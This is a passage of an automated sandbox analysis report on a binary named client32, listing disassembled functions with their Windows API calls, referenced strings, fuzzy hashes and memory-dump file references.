EnterCriticalSection.KERNEL32(0000002C,?,?,00000000,?,1104362F,?,?,?), ref: 110B395F
LeaveCriticalSection.KERNEL32(0000002C,?,?,00000000,?,1104362F,?,?,?), ref: 110B397E
GetSystemMetrics.USER32(0000004C,?,?,?,00000000,?,1104362F,?,?,?), ref: 110B39A7
GetSystemMetrics.USER32(0000004D,?,?,00000000,?,1104362F,?,?,?), ref: 110B39AD
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,1104362F,?,?,?), ref: 110B39DB

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$LeaveMetricsSystem$Enter
String ID:
API String ID: 4125181052-0
Opcode ID: b61a3752badfb56f32cfb2deb03944f9272f81fb0acc9150a138a5a10ab5b813
Instruction ID: 2eabc0a5c64141517199ab689f696fc8c069b56ecca888d5095ec5d0d1156609
Opcode Fuzzy Hash: b61a3752badfb56f32cfb2deb03944f9272f81fb0acc9150a138a5a10ab5b813
Instruction Fuzzy Hash: 6F11B132600608DFD314CF79C9849AAFBE5FFD8314B20866ED51A87614EB72E806CB80

Function 11091B00 Relevance: 7.6, APIs: 5, Instructions: 54windowCOMMON

Download Yara Rule

APIs

GetMessageA.USER32 ref: 11091B1A

Part of subcall function 110CD940: EnterCriticalSection.KERNEL32(00000000,00000000,75097BD3,00000000,75097809,1105E7CB,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD95B
Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000476,00000000,00000000,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD988
Part of subcall function 110CD940: SendMessageA.USER32(00000000,00000475,00000000,?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD99A
Part of subcall function 110CD940: LeaveCriticalSection.KERNEL32(?,?,?,?,11026BA3,00000000,?,?,00000000), ref: 110CD9A4

TranslateAcceleratorA.USER32(?,?,?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B47
TranslateMessage.USER32(?), ref: 11091B51
DispatchMessageA.USER32(?,?,?,?,11093540,?,00000000,?,00000000), ref: 11091B5B
GetMessageA.USER32 ref: 11091B6B

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$CriticalSectionSendTranslate$AcceleratorDispatchEnterLeave
String ID:
API String ID: 754905447-0
Opcode ID: 36596b3fcd7649346ff41791d0d657cf133c8c9ccfa1a3f74e0687a191674282
Instruction ID: 5368b2b879de48b6c9ab70957daae04249f1b13f85d80b649f1e25af9e3021ba
Opcode Fuzzy Hash: 36596b3fcd7649346ff41791d0d657cf133c8c9ccfa1a3f74e0687a191674282
Instruction Fuzzy Hash: D901B172F4030FABE714DBA58C91FABB3ADEB84718F004568F628D6080F674E40587A4

Function 1100D8B0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(pJN,00000000,?,?,1100C26B,00000000,00000000), ref: 1100D8BF
LeaveCriticalSection.KERNEL32(pJN,?,?,1100C26B,00000000,00000000), ref: 1100D930

Part of subcall function 1100D820: EnterCriticalSection.KERNEL32(pJN,1100CB7A,?,1100B5DC,?,00000000,?,1100CB7A,?), ref: 1100D829
Part of subcall function 1100D820: LeaveCriticalSection.KERNEL32(pJN,1100B5DC,?,00000000,?,1100CB7A,?), ref: 1100D8A1

LeaveCriticalSection.KERNEL32(pJN), ref: 1100D8FF
LeaveCriticalSection.KERNEL32(pJN), ref: 1100D91B

Part of subcall function 1100D7D0: EnterCriticalSection.KERNEL32(pJN,1100C4FB), ref: 1100D7D5
Part of subcall function 1100D7D0: LeaveCriticalSection.KERNEL32(pJN), ref: 1100D80F

Strings

pJN, xrefs: 1100D8B7, 1100D8FA, 1100D916, 1100D92B

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$Enter
String ID: pJN
API String ID: 2978645861-809663066
Opcode ID: 10c14cb9c45534fd9ad9362a8b8fd8fef3d09697d59f75ad4657c47dcd1b45a9
Instruction ID: 024bf54fe56583fc36b1911af5d7f6a9c338d46169c8d4f8be6289797e831c79
Opcode Fuzzy Hash: 10c14cb9c45534fd9ad9362a8b8fd8fef3d09697d59f75ad4657c47dcd1b45a9
Instruction Fuzzy Hash: 52018835E0113C6BEB00DBE9ED4D5ADB7A9EB04B9AB4001A6FD18D3A04E631AD0087E1

Function 110B38D0 Relevance: 7.5, APIs: 5, Instructions: 46COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0000002C,?,?,?,1104697C,?,00000001), ref: 110B38DB
LeaveCriticalSection.KERNEL32(0000002C,?,?,?,1104697C,?,00000001), ref: 110B38FE
SetEvent.KERNEL32(?,?,?,?,1104697C,?,00000001), ref: 110B391A
LeaveCriticalSection.KERNEL32(0000002C,?,?,?,1104697C,?,00000001), ref: 110B3921
LeaveCriticalSection.KERNEL32(0000002C,?,?,?,1104697C,?,00000001), ref: 110B3937

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterEvent
String ID:
API String ID: 3394196147-0
Opcode ID: fdee94f62a1441ef2fb2e0d13d0020e1b07e13719dfc0f2ec25fda12d642710e
Instruction ID: 98664a83d6f2f53ed4065ca3297c8b6ddfbfa19bf6bfb34fa0046f3acd8e92ae
Opcode Fuzzy Hash: fdee94f62a1441ef2fb2e0d13d0020e1b07e13719dfc0f2ec25fda12d642710e
Instruction Fuzzy Hash: 9101DB321402149FD32596D9D444BD7FBE8FF69725F00442BF5AAC6900D7B5E046CB51

Function 110F3880 Relevance: 7.5, APIs: 5, Instructions: 45pipesleepCOMMON

Download Yara Rule

APIs

SetNamedPipeHandleState.KERNEL32(00000000,?,00000000,00000000,?,?,?,110F5EF9), ref: 110F3895
ConnectNamedPipe.KERNEL32(00000000,00000000,?,?,110F5EF9), ref: 110F38AA
GetLastError.KERNEL32(?,?,110F5EF9), ref: 110F38B0
Sleep.KERNEL32(00000064,?,?,110F5EF9), ref: 110F38BF
SetNamedPipeHandleState.KERNEL32(00000000,00000003,00000000,00000000,?,?,110F5EF9), ref: 110F38E2

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: NamedPipe$HandleState$ConnectErrorLastSleep
String ID:
API String ID: 218362120-0
Opcode ID: cde699dce36d0e924c4729a61095b99d3c00098eb9d024938d5ff4b1e205ef84
Instruction ID: 6745868c0ac614beeabaf6f2984982edca353f63092262b155279210f934f0d8
Opcode Fuzzy Hash: cde699dce36d0e924c4729a61095b99d3c00098eb9d024938d5ff4b1e205ef84
Instruction Fuzzy Hash: FE01A430A8431EBBF704CFD4CD86BA9B7ACEB48715F2040A9FD14D6580D7755D1187A1

Function 11171306 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 11171312

Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685

__getptd.LIBCMT ref: 11171329
__amsg_exit.LIBCMT ref: 11171337
__lock.LIBCMT ref: 11171347
__updatetlocinfoEx_nolock.LIBCMT ref: 1117135B

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
Instruction ID: 9cb08520484339131e966c5afe67267813abc49f95b778b0e1eea255b6adbda5
Opcode Fuzzy Hash: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
Instruction Fuzzy Hash: 67F0243AD04322DAE7119BB88801B5CF7A16F0073CF110249D814A77C0CFA47810CB5B

Function 11053280 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185COMMON

Download Yara Rule

APIs

Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276

Part of subcall function 11145410: GetSystemMetrics.USER32(0000005E,00000000,00000000,?,110CCCA0,00000000,110314FA,00000104), ref: 1114542A

Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC387
Part of subcall function 110CC360: GetWindowRect.USER32(00000000), ref: 110CC38A
Part of subcall function 110CC360: MapWindowPoints.USER32 ref: 110CC39C
Part of subcall function 110CC360: MapDialogRect.USER32(00000000,?), ref: 110CC3C8
Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC401
Part of subcall function 110CC360: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000010), ref: 110CC41C

Part of subcall function 110183B0: GetSystemMetrics.USER32(0000005E), ref: 110183BF
Part of subcall function 110183B0: GetSystemMetrics.USER32(00002003), ref: 110183DF

std::exception::exception.LIBCMT ref: 11053483
__CxxThrowException@8.LIBCMT ref: 11053498

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11053345, 110533D1
IsA(), xrefs: 1105334A, 110533D6

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$ItemMetricsRectSystem$DialogException@8ObjectPointsShowTextThrowstd::exception::exception
String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 2181554437-3415836059
Opcode ID: 1accb0bbb03bc77863436f13e3d15f929dc8c171c4ae25107a4f7bd902e08966
Instruction ID: 43705d0265472f43c13063854f38501adaeacc0369148bb5472ef3ca99b46591
Opcode Fuzzy Hash: 1accb0bbb03bc77863436f13e3d15f929dc8c171c4ae25107a4f7bd902e08966
Instruction Fuzzy Hash: 1E519375E00209AFDB45DF94CD81EEEF7B9FF44308F108569E5066B281EB35AA05CB91

Function 110218D0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 165windowCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 11021932
IsWindowVisible.USER32(00000000), ref: 11021A03
wsprintfA.USER32 ref: 11021A47

Strings

%d,%d,%d,%d,%d,%d, xrefs: 11021A41

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$VisibleWindow
String ID: %d,%d,%d,%d,%d,%d
API String ID: 1671172596-1913222166
Opcode ID: eef60ca5cad2aaf85d34c80ad1b5db7222e23259f3c31fef37829276a8a7ef1d
Instruction ID: 6217bdbd462a20bf08026d4811e8c1ad77ae889b3603263953c56721c7b36dbb
Opcode Fuzzy Hash: eef60ca5cad2aaf85d34c80ad1b5db7222e23259f3c31fef37829276a8a7ef1d
Instruction Fuzzy Hash: AD519F74700215AFD710DB68CC90FAAB7F9BF88704F108699E65A9B391DB70ED45CBA0

Function 11067090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 110670A8
GetTickCount.KERNEL32(General,TicklePeriod,00000012,00000000), ref: 110671F0

Strings

General, xrefs: 110671DF
TicklePeriod, xrefs: 110671DA

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick
String ID: General$TicklePeriod
API String ID: 536389180-1546705386
Opcode ID: 1e3c80d65e4a9275dada7a8160690c7bfb2ffa6c600ae6bf0c338216ce86f976
Instruction ID: df9d0f281d17993452c850789e07539b87313039e6a264bd0b80c81d914ed6ef
Opcode Fuzzy Hash: 1e3c80d65e4a9275dada7a8160690c7bfb2ffa6c600ae6bf0c338216ce86f976
Instruction Fuzzy Hash: FE516234A00705DFE764CF68C994B9AB7E9FB44300F1085AEE55A8B381EB71BA45CB91

Function 11019B00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 126COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 11019C2A

Strings

..\NsAppSystem\NsAsApplicationObjects\Client32\NsAsMetroClientManager.cpp, xrefs: 11019C35
!"NOT IMPLEMENTED", xrefs: 11019C3A
vector<T> too long, xrefs: 11019C25

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_
String ID: !"NOT IMPLEMENTED"$..\NsAppSystem\NsAsApplicationObjects\Client32\NsAsMetroClientManager.cpp$vector<T> too long
API String ID: 909987262-1355409292
Opcode ID: defab152e2a2a034fa8a3a53941102f1edd972b6cf5954f827a95ad610d094cb
Instruction ID: fc840e911b847fc855133020e95c2a3ba51fe97c4fb46b87c4a8b304b90ffd87
Opcode Fuzzy Hash: defab152e2a2a034fa8a3a53941102f1edd972b6cf5954f827a95ad610d094cb
Instruction Fuzzy Hash: DA41E875F002068FCB1CCE68CDD05AEB7E6F784219B648A3ED927C7688F635E9008751

Function 110774D0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 11077511
CopyRect.USER32(?,00000004), ref: 1107753F

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110774F9
m_hWnd, xrefs: 110774FE

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CopyErrorExitLastLongMessageProcessRectWindowwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2755825785-2830328467
Opcode ID: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
Instruction ID: 59158522108a3a71f1e5bb0466e943617169e98ae829cc3baa7e2fe2b27ff523
Opcode Fuzzy Hash: 4f316e2ed6ddaff1f4214695c10b17982f8ef2501de7a4bdebe5d1d49fe5d49c
Instruction Fuzzy Hash: 5841C271E00B46DBCB15CF68C9C8B6EB7F1EF44344F10856AD8569B644EBB0E940CB98

Function 11031B50 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 104COMMON

Download Yara Rule

Strings

Exit Win10 Start screen (%s), xrefs: 11031BA6
Error. ExitMetro code cannot init kbfilter, xrefs: 11031C39
Error. WindowsD not generated, xrefs: 11031C52

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

